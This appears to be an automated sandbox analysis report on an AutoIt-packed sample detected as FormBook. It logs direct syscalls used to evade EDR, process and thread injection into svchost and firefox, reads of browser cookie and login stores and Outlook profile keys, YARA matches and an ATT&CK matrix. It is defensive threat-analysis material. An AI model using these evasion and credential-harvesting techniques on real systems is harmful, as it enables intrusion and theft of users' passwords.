Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h]	2_2_036629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C69C0 mov eax, dword ptr fs:[00000030h]	2_2_036C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0363A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0363A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036649D0 mov eax, dword ptr fs:[00000030h]	2_2_036649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_036FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036429A0 mov eax, dword ptr fs:[00000030h]	2_2_036429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]	2_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036309AD mov eax, dword ptr fs:[00000030h]	2_2_036309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov esi, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036B89B3 mov eax, dword ptr fs:[00000030h]	2_2_036B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]	2_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036BE872 mov eax, dword ptr fs:[00000030h]	2_2_036BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]	2_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036C6870 mov eax, dword ptr fs:[00000030h]	2_2_036C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03642840 mov ecx, dword ptr fs:[00000030h]	2_2_03642840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03660854 mov eax, dword ptr fs:[00000030h]	2_2_03660854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]	2_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03634859 mov eax, dword ptr fs:[00000030h]	2_2_03634859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov ecx, dword ptr fs:[00000030h]	2_2_03652835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03652835 mov eax, dword ptr fs:[00000030h]	2_2_03652835

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009B81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_009B81F7

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0098A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0098A395
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_0098A364 SetUnhandledExceptionFilter,		0_2_0098A364

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtOpenKeyEx: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtQueryValueKey: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	NtProtectVirtualMemory: Direct from: 0x77377B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread register set: target process: 6308

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A3E008

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009B8C93 LogonUserW,

0_2_009B8C93

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_00963B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00963B4C

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_00964A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00964A35

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009C4EC9 mouse_event,

0_2_009C4EC9

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe"	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

0_2_009B81F7

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009C4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_009C4C03

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: lXlvzubPaBLtjusO.exe, 00000003.00000000.2195461550.0000000001300000.00000002.00000001.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000003.00000002.4578249382.0000000001301000.00000002.00000001.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351168445.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, lXlvzubPaBLtjusO.exe, 00000003.00000000.2195461550.0000000001300000.00000002.00000001.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000003.00000002.4578249382.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: lXlvzubPaBLtjusO.exe, 00000003.00000000.2195461550.0000000001300000.00000002.00000001.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000003.00000002.4578249382.0000000001301000.00000002.00000001.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351168445.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: lXlvzubPaBLtjusO.exe, 00000003.00000000.2195461550.0000000001300000.00000002.00000001.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000003.00000002.4578249382.0000000001301000.00000002.00000001.00040000.00000000.sdmp, lXlvzubPaBLtjusO.exe, 00000008.00000000.2351168445.0000000001200000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_0098886B cpuid

0_2_0098886B

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009950D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009950D7

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009A2230 GetUserNameW,

0_2_009A2230

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_0099418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0099418A

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_00964AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00964AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Binary or memory string: WIN_81
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Binary or memory string: WIN_XP
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Binary or memory string: WIN_XPe
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Binary or memory string: WIN_VISTA
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Binary or memory string: WIN_7
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Binary or memory string: WIN_8
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009D6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_009D6596
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009D6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_009D6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	16 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	51 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
